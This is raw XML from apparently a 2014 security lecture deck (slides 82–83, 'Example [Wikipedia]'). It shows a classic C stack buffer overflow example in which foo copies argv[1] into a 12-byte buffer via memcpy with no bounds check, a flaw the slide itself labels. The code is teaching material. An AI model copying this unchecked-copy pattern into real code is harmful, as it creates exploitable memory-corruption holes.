              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *bar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> c[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(c, bar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(bar));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	// no bounds checking... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	foo(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 8" descr="malware_Stack_Overflow_1"/>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038600" y="1219200"/>
            <a:ext cx="3625850"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741866"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Wikipedia]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376836" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3657600" cy="3657600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *bar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> c[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(c, bar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(bar));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	// no bounds checking... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	foo(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="376838" name="Picture 6" descr="Stack_Overflow_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070350" y="1219200"/>
            <a:ext cx="3625850" cy="518160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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3054461815"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Wikipedia]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376836" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3657600" cy="3657600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *bar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
